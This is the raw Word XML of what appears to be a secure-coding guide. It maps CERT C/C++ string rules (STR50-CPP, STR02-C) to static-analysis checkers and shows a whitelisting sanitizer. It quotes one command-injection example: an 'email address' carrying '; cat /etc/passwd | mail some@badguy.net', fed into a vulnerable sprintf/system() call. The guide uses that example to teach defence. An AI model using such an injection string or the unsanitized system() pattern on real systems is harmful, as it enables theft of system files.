              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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CERT_CPP-STR50-b</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-STR50-c</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-STR50-e</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-STR50-f</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-STR50-g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Avoid overflow due to reading a not zero terminated string</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Avoid overflow when writing to a buffer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Prevent buffer overflows from tainted data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Avoid buffer write overflow from tainted data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Do not use the 'char' buffer to store input from 'std::cin'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId22">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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R2023a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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CERT C++: STR50-CPP</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Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Use of dangerous standard function</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Missing null in string array</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer overflow from incorrect string format specifier</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Destination buffer overflow in string manipulation</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Insufficient destination buffer size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId23">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">RuleChecker</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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32">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">stream-input-char-array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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36">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9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId24">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Sanitize data passed to complex subsystems</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A">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B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[STR02-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcP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These are some examples of complex subsystems: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1"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command processor via a call to system() or similar function (also addressed in ENV03-C. Sanitize the environment when invoking external programs)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">External programs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Relational databases</w:t>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Third-party commercial off-the-shelf components (for example, an enterprise resource planning subsystem)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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rtl w:val="0"/>
              </w:rPr>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system() [Viega 2003]:</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risk, of course, is that the user enters the following string as an email address:</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bogus@addr.com; cat /etc/passwd  | mail some@badguy.net</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">For more information on the system() call, see ENV03-C. Sanitize the environment when invoking external programs and ENV33-C. Do not call system().)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sprintf(buffer, "/bin/mail %s &lt; /tmp/email", addr);</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system(buffer);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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tcp_wrappers package written by Wietse Venema, shows the whitelisting approach:</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benefit of whitelisting is that a programmer can be certain that a string contains only characters that are considered safe by the programmer. Whitelisting is recommended over blacklisting, which traps all unacceptable characters, because the programmer needs only to ensure that acceptable characters are identified. As a result, the programmer can be less concerned about which characters an attacker may try in an attempt to bypass security checks.)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char ok_chars[] = "abcdefghijklmnopqrstuvwxyz"</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"ABCDEFGHIJKLMNOPQRSTUVWXYZ"</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"1234567890_-.@";</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user_data[] = "Bad char 1:} Bad char 2:{";</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*cp = user_data; /* Cursor into string */</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char *end = user_data + strlen( user_data);</w:t>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(cp += strspn(cp, ok_chars); cp != end; cp += strspn(cp, ok_chars)) {</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*cp = '_';</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Sanitize Data Sent to Other Systems</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">All string data should be sanitized prior to being passed along to another system.  This can prevent the string data from being used in a malicious and/or non-intended manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6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B">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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId25">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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74">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IO.INJ.COMMAND</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.INJ.FMT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.INJ.LDAP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.INJ.LIB</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.INJ.SQL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.UT.LIB</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IO.UT.PROC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Format string injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">LDAP injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Library injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Untrusted Library Load</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Untrusted Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId26">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Coverity</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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6.5</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TAINTED_STRING</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187">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId27">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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188">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89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">108 D, 109 D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">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8B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId28">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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8C">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18D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT C: Rec. STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution of externally controlled command</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command executed from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
